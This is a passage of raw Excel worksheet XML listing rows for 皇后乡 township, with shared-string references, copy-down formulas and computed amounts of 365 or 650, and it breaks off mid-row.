    <row r="1970" customHeight="1" spans="1:11">
      <c r="A1970" s="23" t="s">
        <v>5247</v>
      </c>
      <c r="B1970" s="24" t="str">
        <f>B1969</f>
        <v>皇后乡</v>
      </c>
      <c r="C1970" s="24" t="str">
        <f>C1969</f>
        <v>皇后乡</v>
      </c>
      <c r="D1970" s="30" t="s">
        <v>5248</v>
      </c>
      <c r="E1970" s="26" t="s">
        <v>5249</v>
      </c>
      <c r="F1970" s="24" t="str">
        <f>F1969</f>
        <v>4113210615</v>
      </c>
      <c r="G1970" s="24"/>
      <c r="H1970" s="24"/>
      <c r="I1970" s="24">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="J1970" s="24"/>
      <c r="K1970" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1971" customHeight="1" spans="1:11">
      <c r="A1971" s="23" t="s">
        <v>5250</v>
      </c>
      <c r="B1971" s="24" t="str">
        <f>B1970</f>
        <v>皇后乡</v>
      </c>
      <c r="C1971" s="24" t="str">
        <f>C1970</f>
        <v>皇后乡</v>
      </c>
      <c r="D1971" s="30" t="s">
        <v>5251</v>
      </c>
      <c r="E1971" s="26" t="s">
        <v>2067</v>
      </c>
      <c r="F1971" s="24" t="str">
        <f>F1970</f>
        <v>4113210615</v>
      </c>
      <c r="G1971" s="24"/>
      <c r="H1971" s="24"/>
      <c r="I1971" s="24">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="J1971" s="24"/>
      <c r="K1971" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1972" customHeight="1" spans="1:11">
      <c r="A1972" s="23" t="s">
        <v>5252</v>
      </c>
      <c r="B1972" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1972" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1972" s="24" t="s">
        <v>5253</v>
      </c>
      <c r="E1972" s="24" t="s">
        <v>4746</v>
      </c>
      <c r="F1972" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1972" s="24">
        <v>1</v>
      </c>
      <c r="H1972" s="25">
        <v>365</v>
      </c>
      <c r="I1972" s="24">
        <f t="shared" si="30"/>
        <v>365</v>
      </c>
      <c r="J1972" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1972" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1973" customHeight="1" spans="1:11">
      <c r="A1973" s="23" t="s">
        <v>5254</v>
      </c>
      <c r="B1973" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1973" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1973" s="24" t="s">
        <v>5255</v>
      </c>
      <c r="E1973" s="24" t="s">
        <v>4761</v>
      </c>
      <c r="F1973" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1973" s="24">
        <v>1</v>
      </c>
      <c r="H1973" s="25">
        <v>365</v>
      </c>
      <c r="I1973" s="24">
        <f t="shared" si="30"/>
        <v>365</v>
      </c>
      <c r="J1973" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1973" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1974" customHeight="1" spans="1:11">
      <c r="A1974" s="23" t="s">
        <v>5256</v>
      </c>
      <c r="B1974" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1974" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1974" s="24" t="s">
        <v>5257</v>
      </c>
      <c r="E1974" s="24" t="s">
        <v>2199</v>
      </c>
      <c r="F1974" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1974" s="24">
        <v>1</v>
      </c>
      <c r="H1974" s="25">
        <v>365</v>
      </c>
      <c r="I1974" s="24">
        <f t="shared" si="30"/>
        <v>365</v>
      </c>
      <c r="J1974" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1974" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1975" customHeight="1" spans="1:11">
      <c r="A1975" s="23" t="s">
        <v>5258</v>
      </c>
      <c r="B1975" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1975" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1975" s="24" t="s">
        <v>5259</v>
      </c>
      <c r="E1975" s="24" t="s">
        <v>4831</v>
      </c>
      <c r="F1975" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1975" s="24">
        <v>1</v>
      </c>
      <c r="H1975" s="25">
        <v>365</v>
      </c>
      <c r="I1975" s="24">
        <f t="shared" si="30"/>
        <v>365</v>
      </c>
      <c r="J1975" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1975" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1976" customHeight="1" spans="1:11">
      <c r="A1976" s="23" t="s">
        <v>5260</v>
      </c>
      <c r="B1976" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1976" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1976" s="24" t="s">
        <v>5261</v>
      </c>
      <c r="E1976" s="24" t="s">
        <v>4800</v>
      </c>
      <c r="F1976" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1976" s="24">
        <v>1</v>
      </c>
      <c r="H1976" s="25">
        <v>365</v>
      </c>
      <c r="I1976" s="24">
        <f t="shared" si="30"/>
        <v>365</v>
      </c>
      <c r="J1976" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1976" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1977" customHeight="1" spans="1:11">
      <c r="A1977" s="23" t="s">
        <v>5262</v>
      </c>
      <c r="B1977" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1977" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1977" s="24" t="s">
        <v>5263</v>
      </c>
      <c r="E1977" s="24" t="s">
        <v>4743</v>
      </c>
      <c r="F1977" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1977" s="24">
        <v>1</v>
      </c>
      <c r="H1977" s="25">
        <v>365</v>
      </c>
      <c r="I1977" s="24">
        <f t="shared" si="30"/>
        <v>365</v>
      </c>
      <c r="J1977" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1977" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1978" customHeight="1" spans="1:11">
      <c r="A1978" s="23" t="s">
        <v>5264</v>
      </c>
      <c r="B1978" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1978" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1978" s="24" t="s">
        <v>5265</v>
      </c>
      <c r="E1978" s="24" t="s">
        <v>4732</v>
      </c>
      <c r="F1978" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1978" s="24">
        <v>2</v>
      </c>
      <c r="H1978" s="25">
        <v>325</v>
      </c>
      <c r="I1978" s="24">
        <f t="shared" si="30"/>
        <v>650</v>
      </c>
      <c r="J1978" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1978" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1979" customHeight="1" spans="1:11">
      <c r="A1979" s="23" t="s">
        <v>5266</v>
      </c>
      <c r="B1979" s="24" t="str">
        <f>B1978</f>
        <v>皇后乡</v>
      </c>
      <c r="C1979" s="24" t="str">
        <f>C1978</f>
        <v>皇后乡</v>
      </c>
      <c r="D1979" s="31" t="s">
        <v>5267</v>
      </c>
      <c r="E1979" s="31" t="s">
        <v>4903</v>
      </c>
      <c r="F1979" s="24" t="str">
        <f>F1978</f>
        <v>4113210615</v>
      </c>
      <c r="G1979" s="24"/>
      <c r="H1979" s="24"/>
      <c r="I1979" s="24">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="J1979" s="24"/>
      <c r="K1979" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1980" customHeight="1" spans="1:11">
      <c r="A1980" s="23" t="s">
        <v>5268</v>
      </c>
      <c r="B1980" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1980" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1980" s="24" t="s">
        <v>5269</v>
      </c>
      <c r="E1980" s="24" t="s">
        <v>5270</v>
      </c>
      <c r="F1980" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1980" s="24">
        <v>1</v>
      </c>
      <c r="H1980" s="25">
        <v>365</v>
      </c>
      <c r="I1980" s="24">
        <f t="shared" si="30"/>
        <v>365</v>
      </c>
      <c r="J1980" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1980" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1981" customHeight="1" spans="1:11">
      <c r="A1981" s="23" t="s">
        <v>5271</v>
      </c>
      <c r="B1981" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1981" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1981" s="24" t="s">
        <v>5272</v>
      </c>
      <c r="E1981" s="24" t="s">
        <v>5273</v>
      </c>
      <c r="F1981" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1981" s="24">
        <v>2</v>
      </c>
      <c r="H1981" s="25">
        <v>325</v>
      </c>
      <c r="I1981" s="24">
        <f t="shared" si="30"/>
        <v>650</v>
      </c>
      <c r="J1981" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1981" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1982" customHeight="1" spans="1:11">
      <c r="A1982" s="23" t="s">
        <v>5274</v>
      </c>
      <c r="B1982" s="24" t="str">
        <f>B1981</f>
        <v>皇后乡</v>
      </c>
      <c r="C1982" s="24" t="str">
        <f>C1981</f>
        <v>皇后乡</v>
      </c>
      <c r="D1982" s="23" t="s">
        <v>5275</v>
      </c>
      <c r="E1982" s="23" t="s">
        <v>5276</v>
      </c>
      <c r="F1982" s="24" t="str">
        <f>F1981</f>
        <v>4113210615</v>
      </c>
      <c r="G1982" s="24"/>
      <c r="H1982" s="24"/>
      <c r="I1982" s="24">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="J1982" s="24"/>
      <c r="K1982" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1983" customHeight="1" spans="1:11">
      <c r="A1983" s="23" t="s">
        <v>5277</v>
      </c>
      <c r="B1983" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1983" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1983" s="24" t="s">
        <v>5278</v>
      </c>
      <c r="E1983" s="24" t="s">
        <v>4850</v>
      </c>
      <c r="F1983" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1983" s="24">
        <v>1</v>
      </c>
      <c r="H1983" s="25">
        <v>365</v>
      </c>
      <c r="I1983" s="24">
        <f t="shared" si="30"/>
        <v>365</v>
      </c>
      <c r="J1983" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1983" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1984" customHeight="1" spans="1:11">
      <c r="A1984" s="23" t="s">
        <v>5279</v>
      </c>
      <c r="B1984" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1984" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1984" s="24" t="s">
        <v>5280</v>
      </c>
      <c r="E1984" s="24" t="s">
        <v>4797</v>
      </c>
      <c r="F1984" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1984" s="24">
        <v>1</v>
      </c>
      <c r="H1984" s="25">
        <v>365</v>
      </c>
      <c r="I1984" s="24">
        <f t="shared" si="30"/>
        <v>365</v>
      </c>
      <c r="J1984" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1984" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1985" customHeight="1" spans="1:11">
      <c r="A1985" s="23" t="s">
        <v>5281</v>
      </c>
      <c r="B1985" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1985" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1985" s="24" t="s">
        <v>5282</v>
      </c>
      <c r="E1985" s="24" t="s">
        <v>4970</v>
      </c>
      <c r="F1985" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1985" s="24">
        <v>1</v>
      </c>
      <c r="H1985" s="25">
        <v>365</v>
      </c>
      <c r="I1985" s="24">
        <f t="shared" si="30"/>
        <v>365</v>
      </c>
      <c r="J1985" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1985" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1986" customHeight="1" spans="1:11">
      <c r="A1986" s="23" t="s">
        <v>5283</v>
      </c>
      <c r="B1986" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1986" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1986" s="24" t="s">
        <v>5284</v>
      </c>
      <c r="E1986" s="24" t="s">
        <v>2199</v>
      </c>
      <c r="F1986" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1986" s="24">
        <v>1</v>
      </c>
      <c r="H1986" s="25">
        <v>365</v>
      </c>
      <c r="I1986" s="24">
        <f t="shared" si="30"/>
        <v>365</v>
      </c>
      <c r="J1986" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1986" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1987" customHeight="1" spans="1:11">
      <c r="A1987" s="23" t="s">
        <v>5285</v>
      </c>
      <c r="B1987" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1987" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1987" s="24" t="s">
        <v>5286</v>
      </c>
      <c r="E1987" s="24" t="s">
        <v>5240</v>
      </c>
      <c r="F1987" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1987" s="24">
        <v>1</v>
      </c>
      <c r="H1987" s="25">
        <v>365</v>
      </c>
      <c r="I1987" s="24">
        <f t="shared" si="30"/>
        <v>365</v>
      </c>
      <c r="J1987" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1987" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1988" customHeight="1" spans="1:11">
      <c r="A1988" s="23" t="s">
        <v>5287</v>
      </c>
      <c r="B1988" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1988" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1988" s="24" t="s">
        <v>5288</v>
      </c>
      <c r="E1988" s="24" t="s">
        <v>5289</v>
      </c>
      <c r="F1988" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1988" s="24">
        <v>2</v>
      </c>
      <c r="H1988" s="25">
        <v>325</v>
      </c>
      <c r="I1988" s="24">
        <f t="shared" ref="I1988:I2051" si="31">H1988*G1988</f>
        <v>650</v>
      </c>
      <c r="J1988" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1988" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1989" customHeight="1" spans="1:11">
      <c r="A1989" s="23" t="s">
        <v>5290</v>
      </c>
      <c r="B1989" s="24" t="str">
        <f>B1988</f>
        <v>皇后乡</v>
      </c>
      <c r="C1989" s="24" t="str">
        <f>C1988</f>
        <v>皇后乡</v>
      </c>
      <c r="D1989" s="23" t="s">
        <v>5291</v>
      </c>
      <c r="E1989" s="23" t="s">
        <v>5292</v>
      </c>
      <c r="F1989" s="24" t="str">
        <f>F1988</f>
        <v>4113210615</v>
      </c>
      <c r="G1989" s="24"/>
      <c r="H1989" s="24"/>
      <c r="I1989" s="24">
        <f t="shared" si="31"/>
        <v>0</v>
      </c>
      <c r="J1989" s="24"/>
      <c r="K1989" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1990" customHeight="1" spans="1:11">
      <c r="A1990" s="23" t="s">
        <v>5293</v>
      </c>
      <c r="B1990" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1990" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1990" s="24" t="s">
        <v>5294</v>
      </c>
      <c r="E1990" s="24" t="s">
        <v>4709</v>
      </c>
      <c r="F1990" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1990" s="24">
        <v>1</v>
      </c>
      <c r="H1990" s="25">
        <v>365</v>
      </c>
      <c r="I1990" s="24">
        <f t="shared" si="31"/>
        <v>365</v>
      </c>
      <c r="J1990" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1990" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1991" customHeight="1" spans="1:11">
      <c r="A1991" s="23" t="s">
        <v>5295</v>
      </c>
      <c r="B1991" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1991" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1991" s="24" t="s">
        <v>5296</v>
      </c>
      <c r="E1991" s="24" t="s">
        <v>4949</v>
      </c>
      <c r="F1991" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1991" s="24">
        <v>1</v>
      </c>
      <c r="H1991" s="25">
        <v>365</v>
      </c>
      <c r="I1991" s="24">
        <f t="shared" si="31"/>
        <v>365</v>
      </c>
      <c r="J1991" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1991" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1992" customHeight="1" spans="1:11">
      <c r="A1992" s="23" t="s">
        <v>5297</v>
      </c>
      <c r="B1992" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1992" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1992" s="24" t="s">
        <v>5298</v>
      </c>
      <c r="E1992" s="24" t="s">
        <v>5299</v>
      </c>
      <c r="F1992" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1992" s="24">
        <v>1</v>
      </c>
      <c r="H1992" s="25">
        <v>365</v>
      </c>
      <c r="I1992" s="24">
        <f t="shared" si="31"/>
        <v>365</v>
      </c>
      <c r="J1992" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1992" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1993" customHeight="1" spans="1:11">
      <c r="A1993" s="23" t="s">
        <v>5300</v>
      </c>
      <c r="B1993" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1993" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1993" s="24" t="s">
        <v>5301</v>
      </c>
      <c r="E1993" s="24" t="s">
        <v>5302</v>
      </c>
      <c r="F1993" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1993" s="24">
        <v>2</v>
      </c>
      <c r="H1993" s="25">
        <v>325</v>
      </c>
      <c r="I1993" s="24">
        <f t="shared" si="31"/>
        <v>650</v>
      </c>
      <c r="J1993" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1993" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1994" customHeight="1" spans="1:11">
      <c r="A1994" s="23" t="s">
        <v>5303</v>
      </c>
      <c r="B1994" s="24" t="str">
        <f>B1993</f>
        <v>皇后乡</v>
      </c>
      <c r="C1994" s="24" t="str">
        <f>C1993</f>
        <v>皇后乡</v>
      </c>
      <c r="D1994" s="23" t="s">
        <v>5304</v>
      </c>
      <c r="E1994" s="23" t="s">
        <v>5305</v>
      </c>
      <c r="F1994" s="24" t="str">
        <f>F1993</f>
        <v>4113210615</v>
      </c>
      <c r="G1994" s="24"/>
      <c r="H1994" s="24"/>
      <c r="I1994" s="24">
        <f t="shared" si="31"/>
        <v>0</v>
      </c>
      <c r="J1994" s="24"/>
      <c r="K1994" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1995" customHeight="1" spans="1:11">
      <c r="A1995" s="23" t="s">
        <v>5306</v>
      </c>
      <c r="B1995" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1995" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1995" s="24" t="s">
        <v>5307</v>
      </c>
      <c r="E1995" s="24" t="s">
        <v>4935</v>
      </c>
      <c r="F1995" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1995" s="24">
        <v>2</v>
      </c>
      <c r="H1995" s="25">
        <v>325</v>
      </c>
      <c r="I1995" s="24">
        <f t="shared" si="31"/>
        <v>650</v>
      </c>
      <c r="J1995" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1995" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1996" customHeight="1" spans="1:11">
      <c r="A1996" s="23" t="s">
        <v>5308</v>
      </c>
      <c r="B1996" s="24" t="str">
        <f>B1995</f>
        <v>皇后乡</v>
      </c>
      <c r="C1996" s="24" t="str">
        <f>C1995</f>
        <v>皇后乡</v>
      </c>
      <c r="D1996" s="23" t="s">
        <v>5309</v>
      </c>
      <c r="E1996" s="23" t="s">
        <v>4820</v>
      </c>
      <c r="F1996" s="24" t="str">
        <f>F1995</f>
        <v>4113210615</v>
      </c>
      <c r="G1996" s="24"/>
      <c r="H1996" s="24"/>
      <c r="I1996" s="24">
        <f t="shared" si="31"/>
        <v>0</v>
      </c>
      <c r="J1996" s="24"/>
      <c r="K1996" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1997" customHeight="1" spans="1:11">
      <c r="A1997" s="23" t="s">
        <v>5310</v>
      </c>
      <c r="B1997" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1997" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1997" s="24" t="s">
        <v>5311</v>
      </c>
      <c r="E1997" s="24" t="s">
        <v>4727</v>
      </c>
      <c r="F1997" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1997" s="24">
        <v>1</v>
      </c>
      <c r="H1997" s="25">
        <v>365</v>
      </c>
      <c r="I1997" s="24">
        <f t="shared" si="31"/>
        <v>365</v>
      </c>
      <c r="J1997" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1997" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1998" customHeight="1" spans="1:11">
      <c r="A1998" s="23" t="s">
        <v>5312</v>
      </c>
      <c r="B1998" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1998" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1998" s="24" t="s">
        <v>5313</v>
      </c>
      <c r="E1998" s="24" t="s">
        <v>4838</v>
      </c>
      <c r="F1998" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1998" s="24">
        <v>1</v>
      </c>
      <c r="H1998" s="25">
        <v>365</v>
      </c>
      <c r="I1998" s="24">
        <f t="shared" si="31"/>
        <v>365</v>
      </c>
      <c r="J1998" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1998" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1999" customHeight="1" spans="1:11">
      <c r="A1999" s="23" t="s">
        <v>5314</v>
      </c>
      <c r="B1999" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1999" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1999" s="24" t="s">
        <v>5315</v>
      </c>
      <c r="E1999" s="24" t="s">
        <v>4835</v>
      </c>
      <c r="F1999" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1999" s="24">
        <v>1</v>
      </c>
      <c r="H1999" s="25">
        <v>365</v>
      </c>
      <c r="I1999" s="24">
        <f t="shared" si="31"/>
        <v>365</v>
      </c>
      <c r="J1999" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1999" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2000" customHeight="1" spans="1:11">
      <c r="A2000" s="23" t="s">
        <v>5316</v>
      </c>
      <c r="B2000" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C2000" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D2000" s="24" t="s">
        <v>5317</v>
      </c>
      <c r="E2000" s="24" t="s">
        <v>4727</v>
      </c>
      <c r="F2000" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G2000" s="24">
        <v>1</v>
      </c>
      <c r="H2000" s="25">
        <v>365</v>
      </c>
      <c r="I2000" s="24">
        <f t="shared" si="31"/>
        <v>365</v>
      </c>
      <c r="J2000" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2000" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2001" customHeight="1" spans="1:11">
      <c r="A2001" s="23" t="s">
        <v>5318</v>
      </c>
      <c r="B2001" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C2001" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D2001" s="24" t="s">
        <v>5319</v>
      </c>
      <c r="E2001" s="24" t="s">
        <v>5320</v>
      </c>
      <c r="F2001" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G2001" s="24">
        <v>1</v>
      </c>
      <c r="H2001" s="25">
        <v>365</v>
      </c>
      <c r="I2001" s="24">
        <f t="shared" si="31"/>
        <v>365</v>
      </c>
      <c r="J2001" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2001" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2002" customHeight="1" spans="1:11">
      <c r="A2002" s="23" t="s">
        <v>5321</v>
      </c>
      <c r="B2002" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C2002" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D2002" s="24" t="s">
        <v>5322</v>
      </c>
      <c r="E2002" s="24" t="s">
        <v>4970</v>
      </c>
      <c r="F2002" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G2002" s="24">
        <v>1</v>
      </c>
      <c r="H2002" s="25">
        <v>365</v>
      </c>
      <c r="I2002" s="24">
        <f t="shared" si="31"/>
        <v>365</v>
      </c>
      <c r="J2002" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2002" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2003" customHeight="1" spans="1:11">
      <c r="A2003" s="23" t="s">
        <v>5323</v>
      </c>
      <c r="B2003" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C2003" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D2003" s="24" t="s">
        <v>5324</v>
      </c>
      <c r="E2003" s="24" t="s">
        <v>4914</v>
      </c>
      <c r="F2003" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G2003" s="24">
        <v>1</v>
      </c>
      <c r="H2003" s="25">
        <v>365</v>
      </c>
      <c r="I2003" s="24">
        <f t="shared" si="31"/>
        <v>365</v>
      </c>
      <c r="J2003" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2003" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2004" customHeight="1" spans="1:11">
      <c r="A2004" s="23" t="s">
        <v>5325</v>
      </c>
      <c r="B2004" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C2004" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D2004" s="24" t="s">
        <v>5326</v>
      </c>
      <c r="E2004" s="24" t="s">
        <v>2199</v>
      </c>
      <c r="F2004" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G2004" s="24">
        <v>1</v>
      </c>
      <c r="H2004" s="25">
        <v>365</v>
      </c>
      <c r="I2004" s="24">
        <f t="shared" si="31"/>
        <v>365</v>
      </c>
      <c r="J2004" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2004" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2005" customHeight="1" spans="1:11">
      <c r="A2005" s="23" t="s">
        <v>5327</v>
      </c>
      <c r="B2005" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C2005" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D2005" s="24" t="s">
        <v>5328</v>
      </c>
      <c r="E2005" s="24" t="s">
        <v>4853</v>
      </c>
      <c r="F2005" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G2005" s="24">
        <v>1</v>
      </c>
      <c r="H2005" s="25">
        <v>365</v>
      </c>
      <c r="I2005" s="24">
        <f t="shared" si="31"/>
        <v>365</v>
      </c>
      <c r="J2005" s="24">
        <v>45047</v>
      </c>
      <c r="K2005" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2006" customHeight="1" spans="1:11">
      <c r="A2006" s="23" t="s">
        <v>5329</v>
      </c>
      <c r="B2006" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C2006" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D2006" s="24" t="s">
        <v>5330</v>
      </c>
      <c r="E2006" s="24" t="s">
        <v>4758</v>
      </c>
      <c r="F2006" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G2006" s="24">
        <v>1</v>
      </c>
      <c r="H2006" s="25">
        <v>365</v>
      </c>
      <c r="I2006" s="24">
        <f t="shared" si="31"/>
        <v>365</v>
      </c>
      <c r="J2006" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2006" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2007" customHeight="1" spans="1:11">
      <c r="A2007" s="23" t="s">
        <v>5331</v>
      </c>
      <c r="B2007" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C2007" s="24" t="s">
        <v>5332</v>
      </c>
      <c r="D2007" s="24" t="s">
        <v>5333</v>
      </c>
      <c r="E2007" s="24" t="s">
        <v>4764</v>
      </c>
      <c r="F2007" s="24" t="s">
        <v>5334</v>
      </c>
      <c r="G2007" s="24">
        <v>1</v>
      </c>
      <c r="H2007" s="25">
        <v>365</v>
      </c>
      <c r="I2007" s="24">
        <f t="shared" si="31"/>
        <v>365</v>
      </c>
      <c r="J2007" s="41">
        <v>45108</v>
      </c>
      <c r="K2007" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2008" customHeight="1" spans="1:11">
      <c r="A2008" s="23" t="s">
        <v>5335</v>
      </c>
      <c r="B2008" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C2008" s="24" t="s">
        <v>5336</v>
      </c>
      <c r="D2008" s="24" t="s">
        <v>5337</v>
      </c>
      <c r="E2008" s="24" t="s">
        <v>4853</v>
      </c>
